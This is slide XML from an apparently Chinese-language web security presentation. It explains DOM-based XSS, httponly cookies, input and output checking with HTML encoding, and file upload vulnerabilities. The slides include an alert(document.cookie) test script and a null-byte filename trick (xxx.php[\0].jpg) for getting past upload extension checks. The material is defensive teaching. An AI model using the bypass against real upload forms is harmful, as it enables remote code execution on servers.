            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019341" y="482600"/>
            <a:ext cx="7895732" cy="84642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36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">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337"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="337"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33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 grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="337" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="336"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312227" y="2986086"/>
            <a:ext cx="372211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DOM Based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1120775" y="3964780"/>
            <a:ext cx="11506200"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这种类型的xss的并非按照“数据是否保存在服务器端”来划分，DOM Based XSS,从效果上来说也属于反射型xss，单独分类是他形成的原因比较特别，通过修改页面的DOM节点形成的xss，所以单独分类。</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40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13"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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="341" grpId="2"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333275" y="4508498"/>
            <a:ext cx="240074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XSS的防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6518097" y="1655761"/>
            <a:ext cx="18164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Httponly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6454775" y="3586955"/>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输入检查</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6454775" y="5518148"/>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输出检查</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Shape 347"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226175" y="7449343"/>
            <a:ext cx="24003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处理富文本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="348" name="image39.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19111611">
            <a:off x="3195636" y="3211511"/>
            <a:ext cx="3662364" cy="350839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="349" name="image40.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20508699">
            <a:off x="3641725" y="4306887"/>
            <a:ext cx="2778125" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="image41.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="992765">
            <a:off x="3654425" y="5283200"/>
            <a:ext cx="2751139" cy="350839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="image42.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="3067050" y="6565900"/>
            <a:ext cx="3917950" cy="3524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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547686" y="1823243"/>
            <a:ext cx="11907840" cy="237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mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>httponly</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浏览器将禁止页面的javascript访问带有httponly属性的cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="4198936"/>
            <a:ext cx="9047608"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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>header(“Set-Cookie: cookie1=test1;”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>header(“Set-Cookie: cookie2=test2;httponly”, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>alert(document.cookie);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428631" y="7494586"/>
            <a:ext cx="602137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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>只能弹出cookie1不能弹出cookie2</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53"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>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354"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="354"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35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355"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="355"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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 grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="355" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="353" grpId="1"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5530850" y="1562893"/>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输入检查</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Shape 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603249" y="3203574"/>
            <a:ext cx="11796715"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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>和SQL Injection一样，xss也需要攻击者构造一些特殊字符，这些字符普通用户不会用到，所以检查输入就会变的很有必要。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603249" y="5308598"/>
            <a:ext cx="11796715"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>输入检查，在很多时候被用于格式检查有一点像白名单的机制，还会检查数据中是否包含一些特殊字符，如&lt;,&gt;,_,比较智能的“输入检查”，可能还会匹配xss特征。如”&lt;script&gt;”,”javascript”,这可以称为“xss Filter”.</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57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35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358"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35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359"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17"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9" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="357" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="358" grpId="2"/>
    </p:bldLst>
  </p:timing>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5530850" y="1150142"/>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输出检查</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1160461" y="2191543"/>
            <a:ext cx="3771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安全的编码函数：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235075" y="3217862"/>
            <a:ext cx="11534775"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>html代码的编码方式是HtmlEncode,在HtmlEncode中至少需要转义以下字符：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861171" y="4764086"/>
            <a:ext cx="2652219" cy="337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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&amp;—&gt;&amp;amp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;—&gt;&amp;lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&gt;—&gt;&amp;gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>“—&gt; &amp;quot;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>‘—&gt;&amp;#x27;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>/—&gt;&amp;#x2F;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041317" y="8383586"/>
            <a:ext cx="10920578"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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>在php中，有htmlentities（）和htmlspecialchars（）可以满足</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wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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365"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="27"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5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="363" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="361" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="362" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="364" grpId="4"/>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xfrm>
            <a:off x="952500" y="1974850"/>
            <a:ext cx="11099800" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>上传漏洞及防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485774" y="5066505"/>
            <a:ext cx="12031665"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文件上传漏洞指用户上传了一个可执行的文件脚本，并通过此脚本文件获得了执行服务器控制端命令的能力。</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750887" y="2498724"/>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举个例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Shape 371"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763586" y="4082255"/>
            <a:ext cx="12031665"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比如原本应用只允许上传jpg图片，那么可以构造文件名（需要修改post包）为xxx.php[\0].jpg,其中［\0］为十六进制的0x00字符，.jpg绕过了应用的上传文件类型判断；但对于服务器来说，此文件因为0字截断的关系，最终会变成xxx.php。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800099" y="3343273"/>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绕过检查后缀名的方法：</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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37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372"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="372"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
